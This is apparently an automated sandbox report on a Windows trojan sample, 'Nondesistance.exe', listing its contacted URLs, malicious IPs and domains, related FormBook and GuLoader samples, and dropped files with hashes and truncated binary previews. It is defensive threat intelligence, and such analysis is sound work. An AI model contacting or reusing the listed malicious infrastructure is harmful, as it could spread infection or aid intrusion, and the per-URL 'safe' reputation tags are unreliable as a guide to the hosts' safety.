                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://drive.usercontent.google.com/Nondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.iv.lt/svetainiu-kurimo-irankis/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://drive.google.com/HdNondesistance.exe, 00000009.00000002.20393067767.0000000002168000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.iv.lt/el-pasto-filtras/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.sedo.com/services/parking.php3write.exe, 0000000B.00000002.25035537727.0000000005E80000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://ac.ecosia.org/autocomplete?q=write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.osbornesargent.co.ukjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25030471443.0000000000648000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/39/396/39634o.js?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdNondesistance.exe, 00000009.00000001.20120981057.00000000005F2000.00000020.00000001.01000000.00000009.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://drive.google.com/hdNondesistance.exe, 00000009.00000002.20393067767.0000000002168000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://d1di2lzuh97fh2.cloudfront.net/files/0e/0e7/0e7xip.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              172.253.62.132
                                                                              		drive.usercontent.google.comUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              208.112.85.150
                                                                              		fivetownsjcc.comUnited States
                                                                              		20021LNH-INCUStrue
                                                                              79.98.25.1
                                                                              		www.maxiwalls.comLithuania
                                                                              		62282RACKRAYUABRakrejusLTtrue
                                                                              84.32.84.32
                                                                              		noispisok.comLithuania
                                                                              		33922NTT-LT-ASLTtrue
                                                                              142.251.16.101
                                                                              		drive.google.comUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              64.190.62.22
                                                                              		www.donantedeovulos.spaceUnited States
                                                                              		11696NBS11696UStrue
                                                                              91.195.240.123
                                                                              		www.l7aeh.usGermany
                                                                              		47846SEDO-ASDEtrue
                                                                              3.64.163.50
                                                                              		www.gaglianoart.comUnited States
                                                                              		16509AMAZON-02UStrue
                                                                              147.92.36.247
                                                                              		a258paw.yb550.comHong Kong
                                                                              		59371DNC-ASDimensionNetworkCommunicationLimitedHKtrue
                                                                              116.203.164.244
                                                                              		www.wp-bits.onlineGermany
                                                                              		24940HETZNER-ASDEtrue
                                                                              203.161.49.193
                                                                              		www.funtechie.topMalaysia
                                                                              		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                              3.73.27.108
                                                                              		lb.webnode.ioUnited States
                                                                              		16509AMAZON-02UStrue
                                                                              217.70.184.50
                                                                              		webredir.vip.gandi.netFrance
                                                                              		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRtrue
                                                                              162.209.189.152
                                                                              		gly.gly301payr.comUnited States
                                                                              		40065CNSERVERSUSfalse
                                                                              183.111.161.243
                                                                              		grimfilm.co.krKorea Republic of
                                                                              		4766KIXS-AS-KRKoreaTelecomKRtrue
                                                                              185.215.4.19
                                                                              		academynadpo.ruDenmark
                                                                              		50129TVHORADADAEStrue

                                                                              General Information

                                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                                              Analysis ID:1447915
                                                                              Start date and time:2024-05-27 12:28:18 +02:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 17m 44s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                              Run name:Suspected Instruction Hammering
                                                                              Number of analysed new started processes analysed:12
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:1
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Sample name:Nondesistance.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@7/8@31/16
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HCA Information:
                                                                              • Successful, ratio: 72%
                                                                              • Number of executed functions: 55
                                                                              • Number of non-executed functions: 290
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, ctldl.windowsupdate.com, api.msn.com
                                                                              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              06:31:39API Interceptor28389232x Sleep call for process: write.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              208.112.85.150COMPANY PROFILE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • www.fivetownsjcc.com/wu8v/
                                                                              79.98.25.1Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.maxiwalls.com/udud/
                                                                              Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.maxiwalls.com/ntpp/
                                                                              Telescribe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.maxiwalls.com/udud/
                                                                              Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.maxiwalls.com/ntpp/
                                                                              WaybillDoc_43948767.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.povipa.com/gzu1/
                                                                              JUSTIFICANTE DE PAGO 18903547820000.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.maxiwalls.com/ntpp/
                                                                              RFQ-25251.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • www.maxiwalls.com/aleu/?Fb=ok/gmcxpcerYYESWh7Vklw9Bm7swo7gbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBZ6tcFTr4k1D73FrQqb2KesrNG9gusQ==&Cvp=4jl0Z4R0O
                                                                              098754345678.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.maxiwalls.com/z912/
                                                                              2A027vkkdn.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • www.maxiwalls.com/aleu/
                                                                              Dagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.maxiwalls.com/udud/
                                                                              84.32.84.32PO Copy_7854569.exeGet hashmaliciousFormBookBrowse
                                                                              • www.xn--bb55rtp-9va2p.store/a42m/
                                                                              Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.noispisok.com/udud/
                                                                              d35g770B2W.exeGet hashmaliciousFormBookBrowse
                                                                              • www.cloudsoda.xyz/bq83/?LDYd_=QZ64&2fO8I=A0xpY3Z9/xvAtmySY1fqCCDwvzjCLQQBlpcKI6+DiwhVsnXIUP29adYnpwmpxp4Nr4yyF2k6nL20BAG3qifA+Ye29NNZ907SMm83E4qaVMEFDnrxcK60ts0=
                                                                              F2qfVHeuUh.exeGet hashmaliciousFormBookBrowse
                                                                              • www.xn--bb55rtp-9va2p.store/a42m/?AP00=SpRmwiWWWie0LiCQlEyqZ8qlrVU2V43TuTRukl4i+K/mOSJ9++mgtoeJyEwnF13dco3p6AsQh3ikhhdZe62TE0exLZWXo6YrZhtCETMVtGJT4CEP6jXjMKQ=&P6V=btjH
                                                                              Telescribe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.noispisok.com/udud/
                                                                              file.exeGet hashmaliciousFormBookBrowse
                                                                              • www.cloudsoda.xyz/9pwr/
                                                                              3mquY2sUcn.exeGet hashmaliciousFormBookBrowse
                                                                              • www.xn--bb55rtp-9va2p.store/a42m/
                                                                              #U0417#U0430#U043a#U0430#U0437 #U043d#U0430 #U043c#U0430#U0440#U0442.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • www.coinschweiz.com/ktu3/
                                                                              #U0417#U0430#U043a#U0430#U0437 #U043d#U0430 #U0444#U0435#U0432#U0440#U0430#U043b#U044c.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • www.coinschweiz.com/ktu3/
                                                                              #U0417#U0430#U043a#U0430#U0437 #U043d#U0430 #U043c#U0430#U0440#U0442.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • www.coinschweiz.com/ktu3/

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              www.gast.com.plForfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 185.253.215.17
                                                                              vncx.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 185.253.215.17
                                                                              vnc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 185.253.215.17
                                                                              5HR6GXEamJ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 185.253.215.17
                                                                              webredir.vip.gandi.netKT-L068310.exeGet hashmaliciousFormBookBrowse
                                                                              • 217.70.184.50
                                                                              Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 217.70.184.50
                                                                              Telescribe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 217.70.184.50
                                                                              Dagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 217.70.184.50
                                                                              2024_04_005.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 217.70.184.50
                                                                              Udskriftsskemaernes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 217.70.184.50
                                                                              DHL Shipping Receipt_Waybill Doc_PRG2110017156060.exeGet hashmaliciousFormBookBrowse
                                                                              • 217.70.184.50
                                                                              DHL Overdue Account Notice - 1606622076.PDF.exeGet hashmaliciousFormBookBrowse
                                                                              • 217.70.184.50
                                                                              m2 Cotizaci#U00f3n-1634.pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 217.70.184.50
                                                                              2x6j7GSmbu.exeGet hashmaliciousFormBookBrowse
                                                                              • 217.70.184.50
                                                                              www.maxiwalls.comForfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 79.98.25.1
                                                                              FRA.0038253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 79.98.25.1
                                                                              Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 79.98.25.1
                                                                              Telescribe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 79.98.25.1
                                                                              Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 79.98.25.1
                                                                              JUSTIFICANTE DE PAGO 18903547820000.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 79.98.25.1
                                                                              RFQ-25251.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 79.98.25.1
                                                                              Factura1-FVO-2024000893.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 79.98.25.1
                                                                              098754345678.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 79.98.25.1
                                                                              2A027vkkdn.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 79.98.25.1

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              RACKRAYUABRakrejusLTForfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 79.98.25.1
                                                                              Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 79.98.25.1
                                                                              Telescribe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 79.98.25.1
                                                                              SecuriteInfo.com.Win32.BackdoorX-gen.12322.17143.exeGet hashmaliciousXWormBrowse
                                                                              • 176.223.130.167
                                                                              Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 79.98.25.1
                                                                              WaybillDoc_43948767.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 79.98.25.1
                                                                              JUSTIFICANTE DE PAGO 18903547820000.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 79.98.25.1
                                                                              RFQ-25251.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 79.98.25.1
                                                                              098754345678.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 79.98.25.1
                                                                              2A027vkkdn.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 79.98.25.1
                                                                              NTT-LT-ASLTRFQ _ARC 101011-24.exeGet hashmaliciousFormBookBrowse
                                                                              • 84.32.84.33
                                                                              ehQfAH429r.exeGet hashmaliciousRedLine, XWormBrowse
                                                                              • 84.32.84.32
                                                                              https://io-trezorsuite.com/Get hashmaliciousUnknownBrowse
                                                                              • 84.32.84.145
                                                                              https://ios-trezorsuite.com/Get hashmaliciousUnknownBrowse
                                                                              • 84.32.84.140
                                                                              PO Copy_7854569.exeGet hashmaliciousFormBookBrowse
                                                                              • 84.32.84.32
                                                                              Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 84.32.84.32
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                              • 84.32.84.11
                                                                              https://atualizcadastralcras.com/Get hashmaliciousUnknownBrowse
                                                                              • 84.32.84.32
                                                                              d35g770B2W.exeGet hashmaliciousFormBookBrowse
                                                                              • 84.32.84.32
                                                                              F2qfVHeuUh.exeGet hashmaliciousFormBookBrowse
                                                                              • 84.32.84.32
                                                                              LNH-INCUST57QiayIem.elfGet hashmaliciousUnknownBrowse
                                                                              • 66.241.219.243
                                                                              Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 208.112.85.150
                                                                              Telescribe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 208.112.85.150
                                                                              z48S00vB8o.elfGet hashmaliciousMiraiBrowse
                                                                              • 208.112.105.202
                                                                              Company profile.pif.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 208.112.85.150
                                                                              FaKcYgqu4i.elfGet hashmaliciousUnknownBrowse
                                                                              • 208.112.3.93
                                                                              ntml4O6GCE.elfGet hashmaliciousUnknownBrowse
                                                                              • 67.59.184.71
                                                                              RTuZgpOzBm.elfGet hashmaliciousUnknownBrowse
                                                                              • 208.112.153.142
                                                                              NdYuOgHbM9.exeGet hashmaliciousFormBookBrowse
                                                                              • 208.112.85.150
                                                                              Dagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 208.112.85.150
                                                                              NBS11696USForfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 64.190.62.22
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                              • 64.190.63.222
                                                                              SecuriteInfo.com.Trojan.StarterNET.7.17684.18588.exeGet hashmaliciousCrypt888Browse
                                                                              • 64.190.63.136
                                                                              Telescribe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 64.190.62.22
                                                                              RE Draft BL for BK#440019497 REF#388855.exeGet hashmaliciousFormBookBrowse
                                                                              • 64.190.62.22
                                                                              WaybillDoc_43948767.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 64.190.62.22
                                                                              ZAM#U00d3WIENIE_NR.2405073.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                              • 64.190.62.22
                                                                              Liste d'inventaire.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 64.190.62.22
                                                                              vm6XYZzWOd.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                                                              • 64.190.63.222
                                                                              RFQ-25251.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 64.190.62.22

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousVidarBrowse
                                                                              • 172.253.62.132
                                                                              • 142.251.16.101
                                                                              TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                              • 172.253.62.132
                                                                              • 142.251.16.101
                                                                              Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                              • 172.253.62.132
                                                                              • 142.251.16.101
                                                                              WQs56g5xeC.exeGet hashmaliciousDCRatBrowse
                                                                              • 172.253.62.132
                                                                              • 142.251.16.101
                                                                              c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                              • 172.253.62.132
                                                                              • 142.251.16.101
                                                                              QyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                              • 172.253.62.132
                                                                              • 142.251.16.101
                                                                              uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                              • 172.253.62.132
                                                                              • 142.251.16.101
                                                                              QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                              • 172.253.62.132
                                                                              • 142.251.16.101
                                                                              HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                              • 172.253.62.132
                                                                              • 142.251.16.101
                                                                              ccsetup624.exeGet hashmaliciousUnknownBrowse
                                                                              • 172.253.62.132
                                                                              • 142.251.16.101

                                                                              Dropped Files

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dllPlatosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                FRA.0038222.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  Platosammine.exeGet hashmaliciousGuLoaderBrowse
                                                                                    FRA.0038222.exeGet hashmaliciousGuLoaderBrowse
                                                                                      file.zipGet hashmaliciousGuLoaderBrowse
                                                                                        Borgerreprsentants.exeGet hashmaliciousGuLoaderBrowse
                                                                                          Borgerreprsentants.exeGet hashmaliciousGuLoaderBrowse
                                                                                            Eparch.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              Eparch.exeGet hashmaliciousGuLoaderBrowse

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Temp\2f76976

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\write.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3041002, page size 2048, file counter 3, database pages 92, cookie 0x3a, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):188416
                                                                                                Entropy (8bit):0.9926780404836638
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:mavrNdl9bH9KTj8bGA/D3n0mCTV3U25G4qWlrrFB3nKIq9ucs:mavrbl9D9TDn0mCTV3PG43lrfKIq9ps
                                                                                                MD5:BE092D0FC1A86091764AABD40B25CB9E
                                                                                                SHA1:1372556BBC211898F393CC02C4285705AACAE3D7
                                                                                                SHA-256:3A83C0434C667BB30FD9D85D908E652A2569239BBD61079849F299409A48D545
                                                                                                SHA-512:EA6D16D484395A05D836A066248D355DA4C3C7A7B11CA612A87535395C6FDDDF1171624B6B45E41C12C284B5213CE9D22450E212ED0D195280653A4DF19F7892
                                                                                                Malicious:false
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview:SQLite format 3......@ .......\...........:......................................................f............\........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Settings.ini

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\Nondesistance.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):48
                                                                                                Entropy (8bit):4.78778203183594
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:iGAIEXrcAQLQIfLBJXmgxv:lAIccAQkIP2I
                                                                                                MD5:F5FDC9A00B0149608E24C58FD5249EA4
                                                                                                SHA1:E2D50A7CDC8E7A9F9CC9F86074AE23F86A32F841
                                                                                                SHA-256:12D2CA5CF65237CE9AC610E3A80AD20135A76D7E62C1FD92DED6CEA68F774C7C
                                                                                                SHA-512:178DFAB68C39D0D58650B5AEECB702002E82683CD44777920AD884DA89C31BBD1164345CF7F1EC11CD851A249CB4CD7DA0C546C048AADB47F00B7A21304BC7F4
                                                                                                Malicious:false
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview:[Access]..Early=user32::EnumWindows(i r1 ,i 0)..

                                                                                                C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\Nondesistance.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):11264
                                                                                                Entropy (8bit):5.770824470205811
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:PPtkumJX7zB22kGwfy0mtVgkCPOs81un:E702k5qpds8Qn
                                                                                                MD5:B8992E497D57001DDF100F9C397FCEF5
                                                                                                SHA1:E26DDF101A2EC5027975D2909306457C6F61CFBD
                                                                                                SHA-256:98BCD1DD88642F4DD36A300C76EBB1DDFBBBC5BFC7E3B6D7435DC6D6E030C13B
                                                                                                SHA-512:8823B1904DCCFAF031068102CB1DEF7958A057F49FF369F0E061F1B4DB2090021AA620BB8442A2A6AC9355BB74EE54371DC2599C20DC723755A46EDE81533A3C
                                                                                                Malicious:false
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: Platosammine.exe, Detection: malicious, Browse
                                                                                                • Filename: FRA.0038222.exe, Detection: malicious, Browse
                                                                                                • Filename: Platosammine.exe, Detection: malicious, Browse
                                                                                                • Filename: FRA.0038222.exe, Detection: malicious, Browse
                                                                                                • Filename: file.zip, Detection: malicious, Browse
                                                                                                • Filename: Borgerreprsentants.exe, Detection: malicious, Browse
                                                                                                • Filename: Borgerreprsentants.exe, Detection: malicious, Browse
                                                                                                • Filename: Eparch.exe, Detection: malicious, Browse
                                                                                                • Filename: Eparch.exe, Detection: malicious, Browse
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L....z.W...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\betnksomme.lnk

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\Nondesistance.exe
                                                                                                File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                Category:dropped
                                                                                                Size (bytes):914
                                                                                                Entropy (8bit):3.1516065880391015
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:8wl0hRsXUjO/tz0/CSL/KlDe5MJysDeKA8DmzCNfBf4t2YCBTo:8F+VWL/K5eusGeDamyjJT
                                                                                                MD5:91422962043111D43F5BF627D7351B97
                                                                                                SHA1:EA38CEB1BEADCE16E3F744EA1F9891CFAFD4CBEB
                                                                                                SHA-256:EB85BD9933CB721C2D21F5E83EEAAC1B097DB60EAFBA378F9B402AF5884C3AA5
                                                                                                SHA-512:631A29B5AA58AF11CD505F9D93AFF456E555D92C51A2EEE58EFCB6174E3D0BE1B0678B315DAD16EFEE9425993943CCEC5F13C82E9BD7A18F679E4F2B7201EBC4
                                                                                                Malicious:false
                                                                                                Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................D.y.l.a.n.e.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....r.2...........immoralizing.tar..R............................................i.m.m.o.r.a.l.i.z.i.n.g...t.a.r... ...#.....\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.i.m.m.o.r.a.l.i.z.i.n.g...t.a.r. .C.:.\.U.s.e.r.s.\.D.y.l.a.n.e.\.d.e.w.a.t.e.r.\.r.e.i.n.s.m.e.n.............}.............>.e.L.:..er.=}...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.3.................

                                                                                                C:\Users\user\dewater\reinsmen\Transversally.Nor

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\Nondesistance.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):335679
                                                                                                Entropy (8bit):7.6760597278088785
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:7c4er9ypF/PERLfJCNY0REpE15xL+cRHQdo:7TeriFufJC0axLVf
                                                                                                MD5:89A22809A4D9410B8EC476B4FD7A47F6
                                                                                                SHA1:F4562B8538F640E67D0BD4D5D45218C12587F64A
                                                                                                SHA-256:F720F87C41DD1FD5068412983F93280011C03E00D6C2CA9A4B229C2CF38F82B3
                                                                                                SHA-512:8CA7140806DF7BAEE123D39FE598A3919A76EAFD4E7A2229386786F8A62A781BE38DEBBCB6C551026B1B4EC7AFC957EFF580E6ED4BD010D36A5C35BF105DB467
                                                                                                Malicious:false
